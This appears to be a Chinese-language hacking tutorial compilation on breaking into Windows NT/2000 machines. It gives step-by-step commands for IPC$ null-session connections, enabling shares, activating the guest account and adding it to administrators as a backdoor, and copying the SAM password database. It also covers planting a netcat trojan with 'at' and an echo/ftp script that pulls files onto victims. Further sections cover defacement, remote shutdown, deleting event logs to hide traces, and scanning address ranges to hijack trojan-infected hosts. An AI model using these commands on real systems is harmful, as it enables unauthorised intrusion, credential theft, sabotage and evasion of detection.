--D贺免杀专用版还有其他功能,在"进程"项中,可以查看远程主机的进程,并可任意结束其中进程;在"共享"项中,可以创建共享,我常用的是创建C$,D$,E$,F$,共享路径分别对应C:,D:等,共享好后在地址栏中输入"[url=file://IPC$]IPC$[/url]",进入对方C盘,你就可以随意复制删除里面的东西了,而且这种共享对方机子盘符上不会显示共享图标,也就不会被发现,弄完后最好还是把共享给关掉。最后选"日志",清除所有日志,不留痕迹。这个软件会被杀毒软件当作病毒杀掉,用它时须将实时防毒关掉。
3.上面的共享可通过CMD(程序-附件-命令提示符)完成,首先"telnet
IP",telnet上去,键入y后输入的用户名"administrator",密码为空, 进入后,开共享用net share命令,共享C$(即C盘):"net share C$=C:",共享system文件夹:"net share c=c:winntsystem32",共享IPC$用:"net share IPC$"等,最后是关闭共享,关闭C盘共享:"net share C$ /del"。
4.为方便下次入侵,可以设置后门,查看用户:"net user",激活guest用户
"net user guest /active:yes",更改guest的密码为poco:"net user guest poco",把guest的权限提升为管理员权限:"net localgroup administrators guest
/add"。
命令(DOS命令)很多,可去网上查找它的命令,常用的有:查看D盘文件:""dir d:",查看C盘program file文件夹:"dir c:PROGRA~1;",60秒倒记时关机:"shutdown -s -t 60"
补充说明:
use错误原因解决:
(1)."发生系统错误 1326。 登录失败:未知的用户名或错误密码。"
在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,然后再尝试连接。简单文件共享会把网络连接权限都归为 guest连接,是无法访问C$等管理共享的.
(2)"发生系统错误 1327。登陆失败:用户帐户限制。可能的原因包括不允许空密码,登陆时间限制,或强制的策略限。"在远程机的"控制面板-管理工具-本地安全策略-安全选项-用户权限"指派里,禁用"空密码用户只能进行控制台登陆".
(3)"//IP/c$"时提示找不到网络途径。在"网络和拨号连接"中"本地连接"中选取"Internet协议(TCP/IP)"属性,进入"高级TCP/IP设置"选"WINS设置"里面有一项"启用TCP/IP的NETBIOS
二什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c$,d$,e$„„)和系统目录winnt或windows(admin$)共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。
平时我们总能听到有人在说ipc$漏洞,ipc$漏洞,其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说,一定是指微软自己安置的那个‘后门’:空会话(Null session)。那么什么是空会话呢?
三 什么是空会话
在介绍空会话之前,我们有必要了解一下一个安全会话是如何建立的。
在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的,建立成功的会话将成为一个安全隧道,建立双方通过它互通信息,这个过程的大致顺序如下:
1)会话请求者(客户)向会话接收者(服务器)传送一个数据包,请求安全隧道的建立;
2)服务器产生一个随机的64位数(实现挑战)传送回客户;
3)客户取得这个由服务器产生的64位数,用试图建立会话的帐号的口令打乱它,将结
果返回到服务器(实现响应);
4)服务器接受响应后发送给本地安全验证(LSA),LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号,核实本地发生;如果请求的帐号是一个域的帐号,响应传送到域控制器去核实。当对挑战的响应核实为正确后,一个访问令牌产生,然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。
以上是一个安全会话建立的大致过程,那么空会话又如何呢? 空会话是在没有信任的情况下与服务器建立的会话(即未提供用户名与密码),但根据WIN2000的访问控制模型,空会话的建立同样需要提供一个令牌,可是空会话在建立过程中并没有经过用户信息的认证,所以这个令牌中不包含用户信息,因此,这个会话不能让系统间发送加密信息,但这并不表示空会话的令牌中不包含安全标识符SID(它标识了用户和所属组),对于一个空会话,LSA提供的令牌的SID是S-1-5-7,这就是空会话的SID,用户名是:ANONYMOUS LOGON(这个用户名是可以在用户列表中看到的,但是是不能在SAM数据库中找到,属于系统内置的帐号),这个访问令牌包含下面伪装的组:
Everyone
Network
在安全策略的限制下,这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢?
四 空会话可以做什么
对于NT,在默认安全设置下,借助空连接可以列举目标主机上的用户和共享,访问everyone权限的共享,访问小部分注册表等,并没有什么太大的利用价值;对2000作用更小,因为在Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表,而且实现起来也不方便,需借助工具。
从这些我们可以看到,这种非信任会话并没有多大的用处,但从一次完整的ipc$入侵来看,空会话是一个不可缺少的跳板,因为我们从它那里可以得到户列表,而大多数弱口令扫描工具就是利用这个用户列表来进行口令猜解的,成功的导出用户列表大大增加了猜解的成功率,仅从这一点,足以说明空会话所带来的安全隐患,因此说空会话毫无用处的说法是不正确的。以下是空会话中能够使用的一些具体命令:
1 首先,我们先建立一个空连接(当然,这需要目标开放ipc$)
命令:net use [url=file://ipipc$]ipipc$[/url] "" /user:""
注意:上面的命令包括四个空格,net与use中间有一个空格,use后面一个,密码左右各一个空格。
2 查看远程主机的共享资源
命令:net view [url=file://ip]ip[/url]
解释:前提是建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共享,可以得到如下面的结果,但此命令不能显示默认共享。
在 *.*.*.*的共享资源
资源共享名 类型 用途注释
-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。
3 查看远程主机的当前时间
命令: net time [url=file://ip]ip[/url]
解释:用此命令可以得到一个远程主机的当前时间。
4 得到远程主机的NetBIOS用户名列表(需要打开自己的NBT)
命令:nbtstat -A ip
用此命令可以得到一个远程主机的NetBIOS用户名列表,返回如下结果:Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1C> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
<00> UNIQUE Registered
MAC Address = 00-50-8B-9A-2D-37
以上就是我们经常使用空会话做的事情,好像也能获得不少东西哟,不过要注意一点:建立IPC$连接的操作会在Event Log中留下记录,不管你是否登录成功。 好了,那么下面我们就来看看ipc$所使用的端口是什么?
五 ipc$所使用的端口
首先我们来了解一些基础知识:
1 SMB:(Server Message Block) Windows协议族,用于文件打印共享的服务;
2 NBT:(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP协议的NETBIOS网络互联。
3 在WindowsNT中SMB基于NBT实现,即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现。
有了这些基础知识,我们就可以进一步来讨论访问网络共享对端口的选择了:
对于win2000客户端(发起端)来说:
1 如果在允许NBT的情况下连接服务器时,客户端会同时尝试访问139和445端口,如果445端口有响应,那么就发送RST包给139端口断开连接,用455端口进行会话,当445端口无响应时,才使用139端口,如果两个端口都没有响应,则会话失败;
2 如果在禁止NBT的情况下连接服务器时,那么客户端只会尝试访问445端口,如果445端口无响应,那么会话失败。
对于win2000服务器端来说:
1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放(LISTENING);
2 如果禁止NBT,那么只有445端口开放。
我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有监听139或445端口,ipc$会话是无法建立的。
六 ipc管道在hack攻击中的意义
ipc管道本来是微软为了方便管理员进行远程管理而设计的,但在入侵者看来,开放ipc管道的主机似乎更容易得手。通过ipc管道,我们可以远程调用一些系统函数(大多通过工具实现,但需要相应的权限),这往往是入侵成败的关键。如果不考虑这些,仅从传送文件这一方面,ipc管道已经给了入侵者莫大的支持,甚至已经成为了最重要的传输手段,因此你总能在各大论坛上看到一些朋友因为打不开目标机器的ipc管道而一筹莫展大呼救命。当然,我们也不能忽视权限在ipc管道中扮演的重要角色,想必你一定品尝过空会话的尴尬,没有权限,开启管道我们也无可奈何。但入侵者一旦获得了管理员的权限,那么ipc管道这把双刃剑将显示出它狰狞的一面。
七 ipc$连接失败的常见原因
以下是一些常见的导致ipc$连接失败的原因:
1 IPC连接是Windows NT及以上系统中特有的功能,由于其需要用到Windows NT中很多DLL函数,所以不能在Windows 9.x/Me系统中运行,也就是说只有nt/2000/xp才可以相互建立ipc$连接,98/me是不能建立ipc$连接的;
2 如果想成功的建立一个ipc$连接,就需要响应方开启ipc$共享,即使是空连接也是这样,如果响应方关闭了ipc$共享,将不能建立连接;
3 连接发起方未启动Lanmanworkstation服务(显示名为:Workstation):它提供网络链结和通讯,没有它发起方无法发起连接请求;
4 响应方未启动Lanmanserver服务(显示名为:Server):它提供了 RPC 支持、文件、打印以及命名管道共享,ipc$依赖于此服务,没有它主机将无法响应发起方的连接请求,不过没有它仍可发起ipc$连接;
5 响应方未启动NetLogon,它支持网络上计算机 pass-through 帐户登录身份(不过这种情况好像不多);
6 响应方的139,445端口未处于监听状态或被防火墙屏蔽;
7 连接发起方未打开139,445端口;
8 用户名或者密码错误:如果发生这样的错误,系统将给你类似于'无法更新密码'这样的错误提示(显然空会话排除这种错误);
9 命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的双引号可以省略,如果密码为空,可以直接输入两个引号""即可;
10 如果在已经建立好连接的情况下对方重启计算机,那么ipc$连接将会自动断开,需要重新建立连接。
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问:很可能你使用的用户不是管理员权限的;
错误号51,Windows无法找到网络路径:网络有问题;
错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连;
错误号1326,未知的用户名或错误密码:原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动;
错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。
...............哈哈,你先删除原来的链接, net use
[url=file://ipipc$]ipipc$[/url] /del 删除IPC链接 ,然后在链接就好
第二步
运行1号软件,首先出现的是“网络刺客II注册向导”,别理它,点击“稍后(Q)”就进入了网络刺客II的主界面。
第三步
在网络刺客II的主界面里选“工具箱(U)”-》“主机查找器(H)”,就进入了“搜索因特网主机”界面。
第四步
进入“搜索因特网主机”界面后,“起始地址”栏填***.***.0.0其中***.***自己去选择了,比如你可以选61.128或选61.200等等,“结束地址”栏填***.***.255.255其中***.***的选择要和前面一样。“端口”栏填7626,其他栏保持默认不动。
好了,以上设置就是要搜索从***.***.0.0到***.***.255.255这一段IP地址中有冰河木马的计算机了,再检查一下填对没有?如果一切OK,请点击“开始搜索”。
第五步
观察“总进度”和“段进度”是否在走动。如果没有走动,那一定是IP地址设置不对,请认真检查。如果两个进度都在走动,呵呵,你就成功一半了,至少你会使用网络刺客II扫描网上开放某一端口的计算机了。
下面你要作的就是静静的等待,学用黑客软件是需要耐心的。大约20-30分钟后,最下面的记录栏里就应该出现记录了(一般情况下,应该有5、6条记录)。每一条记录代表找到的中了冰河木马的一台计算机,前面是该计算机的IP地址,后面是7626(冰河木马端口)。
第六步
点击“停止搜索”,但不要退出程序,到第十二步时还要用。运行2号软件冰河,进入冰河主界面。选“文件[F]”-》“添加主机[A]”进入添加主机窗口。
第七步
在“添加主机”窗口,“显示名称”里填入第五步里搜索到的第一条IP地址,当IP地址填入“显示名称”里后,“主机地址”里就自动填入相同的IP了。“访问口令”不填,“监听端口”保持默认的7626。
好了,检查一下IP有没有填错,如果OK,点击“确定”,在冰河主界面的“文件管理器”里就出现了刚才填入的IP地址了。
第八步
这一步和下一步最重要,请认真看清楚!在冰河的主界面里,点击“文件管理器”里的“我的电脑”,这时“文件管理器”右边的框里就会出现你自己的硬盘分区。比如,如果你的硬盘分的是四个区,“文件管理器”右边的框里就会从上往下依次出现C:、D:、E:、F:,如果你的硬盘分的是两个区,就会出现C:、D:。
第九步
点击“文件管理器”里刚才输入的第一条IP地址,稍等片刻(网速慢的情况下约10-30秒),在“文件管理器”右边的框里就会出现对方计算机的硬盘分区了。看到了吗?看到了?呵呵,祝贺你,你已经成功地进入对方的计算机了!!!!!
第十步
你发现没有出现对方计算机的硬盘分区!!呵呵,别急,看看冰河主界面最下端的状态栏里有什么提示,如果是下面两种情况,就放弃,返回第七步,填入搜索到的第二条IP地址:
1、状态栏里出现“口令不对”、“口令错误”、“密码不对”、“密码错误”等之类的提示,表示该计算机的冰河木马是加了密码的,没有办法,只得放弃!
2、状态栏里出现“正在解释命令,可能是1.2以前版本”等之类的提示,也放弃,新手是搞不定的,如果以后你熟练了可以给对方升级,这是后话!!
第十一步
如果出现的是“主机没有响应”、“无法与主机建立连接”之类的提示,先别忙放弃,重复3-4遍第八步到第九步的*作,即点击“我的电脑”-》点击输入的IP地址,如此反复3-4遍后,还是不行的话再放弃,返回第七步,填入搜索到的下一条IP地址。
第十二步
如果所有搜索到的IP地址按照第七步至第十一步*作后都不能进入对方计算机,呵呵,那是你的运气太差!别急,这样的运气是经常碰到的!再返回第五步,在“搜索因特网主机”界面里点击“开始搜索”,这时该程序又从你停止的IP地址接着往下搜索了!!呵呵,等吧!!搜索吧!!只要你有时间,你一定能成功!
第十三步 终于成功了!我见到对方计算机硬盘分区了!呵呵,怎么样?你成功了,我的任务就完成了。进入对方计算机后,所有的*作和自己计算机“文件管理器”里的*作一模一样!就没什么黑不到过来的了
如何进入别人的电脑- -
大学时在参加ACCP的电脑编程课程,只是兴趣而已,并没有多么的用心学,对一些乱七八糟的东西比较感兴趣,那时做的最多的就是尝试进入别人的电脑和服务器........
1、取得对方IP地址如,方法太多不细讲了。
2.判断对方上网的地点,开个DOS窗口键入 TRACERT 第4和第5行反映的信息既是对方的上网地点。
3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A
第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明
4.在Windows目录下有一文件名为,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件:
电脑名
5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入
黑客命令之1:NET
只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!
这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为
127.0.0.1
net use 127.0.0.1ipc$ "123456" /user:"hbx"
退出的命令是
net use 127.0.0.1ipc$ /delte
下面的*作你必须登陆后才可以用.登陆的方法就在上面.
----------------------
下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用
户.
我们加一个heibai的用户密码为lovechina
net user heibai lovechina /add
只要显示命令成功,那么我们可以把他加入Administrator组了.
net localgroup Administrators heibai /add
----------------------
这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这
里把对方的C盘映射到本地的Z盘.
net use z:127.0.0.1c$
----------------------
net start telnet
这样可以打开对方的TELNET服务.
----------------------
这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?
不知道是否这样,我的2000就是删除不了它。
net user guest /active:yes
----------------------
这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,
其他用户也可以的。只要有权限就行了呀!
net user guest lovechina
黑客命令之2:at
一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢?
那么需要用AT命令,这里假设你已经登陆了那个服务器。
你首先要得到对方的时间,
net time 127.0.0.1
将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1
at 127.0.0.1 12:3
这里假设了一个木马,名为,这个东西要在对方服务器上.
这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它
是一个TELNET服务,端口为99.
等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.
黑客命令之3:telnet
这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用
户,不过你给对方种了木马,直接连到这个木马打开的端口.
telnet 127.0.0.1 99
这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也
就是肉鸡.
黑客命令之4:FTP
它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空
间,国内多的是,如果真的找不到,我给个,
不错的.当我们申请完后,它会给用户名,密码,以及FTP服务器
在上传前需要登陆先,这里我们假设FTP服务器是 H, ttp://
用户名是HUCJS,密码是654321
ftp /
他会要求输入用户,成功后会要求输入密码.----------------------
下面先说上传,假设你需上传的文件是,它位于C:下,传到对方D:
get c: d:
假设你要把对方C盘下的,下到你的机子的D盘下
put c: d:
黑客命令之5:copy
下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。
这里我们把本地C盘下的复制到127.0.0.1的C盘下
copy 127.0.0.1c$ ----------------------
如果你要复制到D盘下把C改为D,就行了!
copy 127.0.0.1d$ ----------------------
如果你要把他复制到WINNT目录里
就要把输入
copy 127.0.0.1admin$
admin$是winnt ----------------------
要把对方的文件复制过来,顺便告诉大家NT的备份的数据库放在
x:winntrepairsam._ sam._是数据库的文件名
下面就把127.0.0.1的数据库复制到本地C盘下
copy 127.0.0.1admin$repairsam._ c:
黑客命令之7:nbtstat
如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就
要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后
就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都
试下,不行就暴力破解吧!
现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分
析得到的结果。
命令是
nbtstat -A
-A一定要大写。
下面是得到的结果。
NetBIOS Remote Machine Name Table
Name 无效 Status
---------------------------------------------
Registered Registered Registered Registered Registered
Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是
不是看到了一窜数字,只要这窜数字是<03>的话,那他前面的就是用
户。
这里的用户是PENTIUMII。
黑客命令之8:Shutdown
关了对方的NT服务器的命令
Shutdown IP地址 t:20
20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大的损失,要做个有良心的入侵者呀。
黑客命令之10:echo
著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主
机。
我们假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖!”
写入,有2种方法,大家看看有什么区别。
echo 南京大屠杀铁证如山,任何日本人不得抵赖!>
echo 南京大屠杀铁证如山,任何日本人不得抵赖!>>
第一个的意思是覆盖原有的内容,把“南京大屠杀铁证如
山,任何日本人不得抵赖!”写进。
第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖!”
加到里面。
“>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。
大家可以本地试下。
可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页
到对方的目录里。
1、首先,我们需要申请一个免费的主页空间。
2、用echo在可写目录下建立如下内容的txt文件:(以chinren服务器为例。)
open (你的FTP服务器,申请时你的空间提供商
会给你的)
cnhack(你申请时的用户名)
test(你申请时的密码)
get c:(这里是把你空间上
的下载到对方的c:)
bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS)
具体的做法:
输入 echo open > c:
输入 echo cnhack >> c:
输入 echo 39abs >> c:
输入 echo get
c:+>>+c:
最后输入 ftp -s:c: (利用ftp的-s参数,执行文件里的
内容。)
等命令完成时,文件已经下载到你指定的文件里了。
注意:取得文件后,请删除。(如果不删除,很容易会给
别人看到你的密码。)
记得要 del c:
黑客命令之11:attrib
这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件
属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不
行。倒!不过有这个命令就别怕了。
attrib -r
这个命令是把的只读属性去掉。
如果把“-”改为“+”则是把这个文件的属性设置为只读 ----------------------
attrib +r
这个命令是把的属性设置为只读。
黑客命令之12:del
当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日
志,当然要删除日志啦!想被捉吗。呵呵。
NT的日志有这些
del C:winntsystem32logfiles*.*
del C:winntssytem32config*.evt
del C:winntsystem32dtclog*.*
del C:winntsystem32*.log
del C:winntsystem32*.txt
del C:winnt*.txt
del C:winnt*.log
只要删除这些就可以了。有些系统NT安装在D盘或其他盘,就要把C改
成其他盘。
端口入侵工具
发布评论